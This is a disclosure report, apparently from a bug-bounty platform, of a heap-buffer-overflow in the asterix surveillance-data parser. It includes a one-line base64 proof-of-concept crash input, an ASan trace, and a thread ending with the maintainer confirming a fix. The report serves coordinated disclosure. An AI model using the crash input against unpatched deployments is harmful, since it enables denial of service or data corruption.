Heap-based Buffer Overflow in croatiacontrolltd/asterix

Valid

Reported on

May 21st 2021


✍️ Description

Whilst experimenting with asterix, built from commit f44cfea, compiled with Clang 10 (+ ASan) on Ubuntu 20.04.2 LTS, we are able to induce a heap-buffer-overflow in DataItemBits::getBits (asterix/src/asterix/DataItemBits.cpp:125).

Since there is no bounds checking, when the software encounters a malformed file like in our POC, it throws ERROR: May 21 21:08:19 2021 (/root/asterix/src/asterix/asterixformat.cxx) Wrong data length in Explicit. Needed=3 and there is 4 bytes. while overflowing the buffer by 1 byte.

Please enter a description of the vulnerability.

🕵️‍♂️ Proof of Concept

echo "FQAsxR0xAUMjBAABAUDUtz76ZboAAAE4QXY62rn1AAIACMtUDQ0NBQjwaGV4AC/FHTEBQyMEAAEBQCu3OvplswAAAjhBlQpIWgwAAhUIrVUBEAoKCv8FCHDxQA==" | base64 -d > /tmp/fuzz.file && cat /tmp/fuzz.file | ./asterix

The above command line translates into this ASan stack trace:

==2911984==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000215 at pc 0x0000004ffd53 bp 0x7ffcca11d530 sp 0x7ffcca11d528
READ of size 1 at 0x602000000215 thread T0
    #0 0x4ffd52 in DataItemBits::getBits(unsigned char*, int, int, int) /root/asterix/src/asterix/DataItemBits.cpp:125:36
    #1 0x4ffd52 in DataItemBits::getUnsigned(unsigned char*, int, int, int) /root/asterix/src/asterix/DataItemBits.cpp:160:31
    #2 0x4ffd52 in DataItemBits::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemBits.cpp:471:35
    #3 0x50c9da in DataItemFormatFixed::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemFormatFixed.cpp:180:20
    #4 0x507a30 in DataItemFormatCompound::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemFormatCompound.cpp:164:38
    #5 0x509e25 in DataItemFormatExplicit::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemFormatExplicit.cpp:88:24
    #6 0x4ea3e6 in DataItemDescription::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int, unsigned char*, long) /root/asterix/src/asterix/DataItemDescription.h:48:27
    #7 0x4ea3e6 in DataItem::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int) /root/asterix/src/asterix/DataItem.cpp:72:34
    #8 0x515889 in DataRecord::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int) /root/asterix/src/asterix/DataRecord.cpp:205:21
    #9 0x4e7e70 in DataBlock::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int) /root/asterix/src/asterix/DataBlock.cpp:107:21
    #10 0x4d4ad4 in AsterixData::getText(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, unsigned int) /root/asterix/src/asterix/AsterixData.cpp:56:17
    #11 0x4d7bd8 in CAsterixFormat::WritePacket(CBaseFormatDescriptor&, CBaseDevice&, unsigned int, bool&) /root/asterix/src/asterix/asterixformat.cxx:129:45
    #12 0x531d9a in CChannelFactory::WritePacket(unsigned int) /root/asterix/src/engine/channelfactory.cxx:282:34
    #13 0x5369c4 in CConverterEngine::Start() /root/asterix/src/engine/converterengine.cxx:184:54
    #14 0x55dfcd in main /root/asterix/src/main/asterix.cpp:387:43
    #15 0x7fa3544160b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #16 0x429bfd in _start (/root/asterix/install/asterix+0x429bfd)

0x602000000215 is located 0 bytes to the right of 5-byte region [0x602000000210,0x602000000215)
allocated by thread T0 here:
    #0 0x4d1bbd in operator new[](unsigned long) (/root/asterix/install/asterix+0x4d1bbd)
    #1 0x4eb887 in DataItem::parse(unsigned char const*, long) /root/asterix/src/asterix/DataItem.cpp:115:19
    #2 0x513145 in DataRecord::DataRecord(Category*, int, unsigned long, unsigned char const*, double) /root/asterix/src/asterix/DataRecord.cpp:96:30
    #3 0x4e6d77 in DataBlock::DataBlock(Category*, unsigned long, unsigned char const*, double) /root/asterix/src/asterix/DataBlock.cpp:43:30
    #4 0x516a81 in InputParser::parsePacket(unsigned char const*, unsigned int, double) /root/asterix/src/asterix/InputParser.cpp:103:33
    #5 0x4e3d39 in CAsterixRawSubformat::ProcessPacket(CBaseFormatDescriptor&, CBaseDevice&, bool&, bool) /root/asterix/src/asterix/asterixrawsubformat.cxx:206:62
    #6 0x4d8404 in CAsterixFormat::ProcessPacket(CBaseFormatDescriptor&, CBaseDevice&, unsigned int, bool&) /root/asterix/src/asterix/asterixformat.cxx
    #7 0x5325b9 in CChannelFactory::ProcessPacket(bool&) /root/asterix/src/engine/channelfactory.cxx:319:27
    #8 0x536426 in CConverterEngine::Start() /root/asterix/src/engine/converterengine.cxx:147:51
    #9 0x55dfcd in main /root/asterix/src/main/asterix.cpp:387:43
    #10 0x7fa3544160b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/asterix/src/asterix/DataItemBits.cpp:125:36 in DataItemBits::getBits(unsigned char*, int, int, int)

💥 Impact

This vulnerability is capable of crashing the software or corrupting data.

Geeknik Labs
4 months ago

Researcher


@admin Can we reach out to the developers in order to get some eyes on this? Thank you.

Ziding Zhang
4 months ago

Admin


Hey Geeknik, same drill, here's a PR asking for a security policy from the repo. Tag in the maintainers to bring their attention to it.

Geeknik Labs
2 months ago

Researcher


Yet another repository uninterested in securing their code. 🤣🤣🤣🤣🤣

Geeknik Labs
2 months ago

Researcher


I’ll be requesting a CVE through Mitre and making a detailed post to the FD mailing list.

Geeknik Labs modified their report
2 months ago
Damir Salantic
2 months ago

Maintainer


Thank you for your report. The issue has been fixed in latest release.

Jamie Slome
2 months ago

Admin


@maintainer - are you able to mark the report as valid and confirm the fix using the buttons presented?

Damir Salantic validated this vulnerability 2 months ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Damir Salantic confirmed that a fix has been merged on 3f765d 2 months ago
Damir Salantic has been awarded the fix bounty